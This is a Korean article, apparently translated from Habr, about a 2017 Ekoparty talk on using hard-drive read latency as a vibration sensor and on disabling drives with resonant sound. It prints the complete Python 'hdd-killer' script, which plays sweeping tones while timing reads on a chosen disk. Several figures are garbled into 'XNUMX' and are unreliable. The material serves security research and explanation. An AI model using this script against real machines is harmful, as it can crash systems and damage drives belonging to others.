부에노스아이레스에서 열린 Ekoparty 2017 컴퓨터 보안 컨퍼런스에서 아르헨티나 해커 Alfredo Ortega는 마이크를 사용하지 않고 건물을 은밀하게 도청하는 시스템이라는 매우 흥미로운 개발을 보여주었습니다. 소리 하드 드라이브에 직접 기록됨!

HDD는 주로 고강도 저주파 소리, 발자국 소리 및 기타 진동을 포착합니다. 인간의 말은 아직 인식할 수 없습니다. 이 방향으로 연구를 진행하고 있습니다 (예를 들어 자이로스코프나 HDD에서 녹음된 저주파 진동을 통한 음성 인식)

소리는 공기나 다른 매체의 진동입니다. 사람은 진동을 내이로 전달하는 고막을 통해 이를 감지합니다. 마이크는 대략 귀처럼 설계되었습니다. 여기에서도 진동이 얇은 막에 녹음되어 전기 충격을 자극합니다. 물론 하드 드라이브는 주변 공기의 변동으로 인해 미세한 진동을 받기도 합니다. 이는 HDD의 기술적 특성을 통해서도 알려져 있습니다. 제조업체는 일반적으로 허용되는 최대 진동 수준을 표시하며 하드 드라이브 자체는 종종 이를 고무 또는 기타 절연 재료로 만든 방진 용기에 넣으려고 합니다. 이것으로 HDD를 사용하여 소리를 녹음할 수 있다는 결론을 내리기 쉽습니다. 남은 것은 방법을 알아내는 것뿐입니다.

Alfredo Ortega는 사이드 채널 공격의 독특한 버전, 즉 시간 공격을 제안했습니다. 이 공격은 주어진 입력 데이터에 따라 장치에서 서로 다른 작업이 서로 다른 시간에 수행된다는 가정을 기반으로 합니다. 이 경우 "입력 데이터"는 읽기 헤드와 HDD 플래터의 진동이며, 이는 환경의 진동, 즉 소리와 관련이 있습니다. 따라서 계산 시간을 측정하고 데이터의 통계적 분석을 수행함으로써 헤드/플래터의 진동과 그에 따른 매체의 진동을 측정할 수 있습니다. 데이터 읽기 지연 시간이 길어질수록 HDD의 진동이 강해지기 때문에 소리도 커집니다.

하드 드라이브 진동을 측정하는 방법은 무엇입니까? 매우 간단합니다. 시스템 호출만 실행하면 됩니다. read () - 완료하는 데 걸리는 시간을 기록합니다. 최신 운영 체제를 사용하면 나노초 정확도로 시스템 호출 타이밍을 읽을 수 있습니다.

섹터에서 정보를 읽는 속도는 헤드와 플래터의 위치에 따라 달라지며 이는 HDD 케이스의 진동과 관련이 있습니다. 그게 다야.

간단한 Kscope 유틸리티를 사용하여 통계 분석을 수행합니다. 그들이 말했듯이 독창적인 모든 것은 간단합니다.

Kscope 유틸리티(stat() syscall)

Kscope는 시스템 호출 실행 시간의 작은 차이를 시각화하는 작은 유틸리티입니다. 원천GitHub에 게시됨.

별도의 저장소에 HDD 시간 하드 드라이브에 대한 시간 공격을 위해 구성된 유틸리티 버전이 있습니다. 즉, 시스템 호출을 분석하도록 구성된 유틸리티 버전이 있습니다. read ().

HDD를 이용한 사운드 녹음 시연, Kscope 유틸리티 작동

물론 이런 식으로 음성을 이해할 수는 없지만 HDD는 진동 센서로 매우 적합합니다. 예를 들어, 딱딱한 신발을 신거나 맨발로 사람이 컴퓨터를 가지고 방에 들어간 경우 등록할 수 있습니다. (아마도 공격자가 부드러운 운동화를 신거나 바닥에 두꺼운 카펫이 깔려 있으면 HDD는 진동을 등록할 수 없습니다.) 이는 확인해 볼 가치가 있습니다). 컴퓨터는 깨진 유리나 기타 사고를 강한 소리 강도로 등록할 수 있습니다. 즉, 하드 드라이브는 일종의 무단 침입 탐지 시스템 역할을 할 수 있습니다.

HDD 킬러

그런데 비슷한 기술을 사용하여 하드 드라이브를 비활성화할 수 있습니다. 여기서만 HDD에서 진동을 제거하지 않고 반대로 HDD에 공급되는 진동을 생성합니다. HDD 주파수와 공명하는 주파수로 스피커에서 소리를 재생하면 시스템은 곧 I/O 오류로 장치를 끕니다(Linux 커널은 120초 후에 HDD를 완전히 끕니다). 하드 드라이브 자체가 복구할 수 없는 손상을 입을 수 있습니다.

Linux 커널은 Edifier r120u USB 스피커의 스피커를 통해 공진 주파수의 사운드를 전달한 후 19초 후에 하드 드라이브를 껐습니다. 스피커는 약 100/20 전력(XNUMXmW 미만)으로 켜지며 HDD에서 XNUMXcm 떨어진 곳에 위치하며 진동을 강화하기 위해 테이블을 겨냥합니다. 프레임: 비디오 클립 HDD 킬러 시연과 함께

HDD에 대한 이러한 "공격"이 일상 생활에서 완전히 우연히 발생하는 경우가 있다는 것이 궁금합니다. 예를 들어, 2016년 10월 ING 은행 데이터센터는 소방 훈련 이후 XNUMX시간 동안 운영을 중단해야 했습니다. 수십 개의 하드 드라이브가 고장났습니다. 고압의 실린더에서 불활성 가스가 방출되는 큰 소리 때문입니다. 소리는 매우 컸지만(130dB 이상) 하드 드라이브에 소리를 지를 수도 없습니다. 이로 인해 HDD 액세스 지연이 늘어납니다.

데이터 센터의 하드 드라이브에서 인간이 비명을 지르는 모습. 지연 시간 측정

공명하는 소리를 생성하기 위해 Alfredo Ortega는 다음과 같은 Python 스크립트를 작성했습니다. HDD 킬러 (비디오 시연).

HDD 킬러 스크립트 용량이 매우 작으므로 여기에 전체 내용을 게시할 수 있습니다.

"""PyAudio hdd-killer: Generate sound and interfere with HDD """
"""Alfredo Ortega @ortegaalfredo"""
"""Usage: hdd-killer /dev/sdX"""
"""Where /dev/sdX is a spinning hard-disk drive"""
"""Turn the volume to the max for better results"""
"""Requires: pyaudio. Install with 'sudo pip install pyaudio' or 'sudo apt-get install python-pyaudio'"""

import pyaudio
import time
import sys
import math
import random

RATE=48000
FREQ=50

# validation. If a disk hasn't been specified, exit.
if len(sys.argv) < 2:
    print "hdd-killer: Attempt to interfere with a hard disk, using sound.nn" +
	  "The disk will be opened as read-only.n" + 
          "Warning: It might cause damage to HDD.n" +
          "Usage: %s /dev/sdX" % sys.argv[0]
    sys.exit(-1)

# instantiate PyAudio (1)
p = pyaudio.PyAudio()
x1=0
NEWFREQ=FREQ

# define audio synt callback (2)
def callback(in_data, frame_count, time_info, status):
    global x1,FREQ,NEWFREQ
    data=''
    sample=0
    for x in xrange(frame_count):
        oldsample=sample
        sample=chr(int(math.sin(x1*((2*math.pi)/(RATE/FREQ)))*127)+128)
        data = data+sample
        # continous frequency change
        if (NEWFREQ!=FREQ) and (sample==chr(128)) and (oldsample<sample) :
                FREQ=NEWFREQ
                x1=0
        x1+=1
    return (data, pyaudio.paContinue)

# open stream using callback (3)
stream = p.open(format=pyaudio.paUInt8,
                channels=1,
                rate=RATE,
                output=True,
                stream_callback=callback)

# start the stream (4)
stream.start_stream()

# wait for stream to finish (5)
while stream.is_active():
    timeprom=0
    c=file(sys.argv[1])
    for i in xrange(20):
        a=time.clock()
        c.seek(random.randint(0,1000000000),1) #attempt to bypass file buffer
        c.read(51200)
        b=time.clock()
        timeprom+=b-a
    c.close()
    timeprom/=20
    print("Frequency: %.2f Hz File Read prom: %f us" % (FREQ,timeprom*1000000))
    NEWFREQ+=0.5

# stop stream (6)
stream.stop_stream()
stream.close()

# close PyAudio (7)
p.terminate()

출처 : habr.com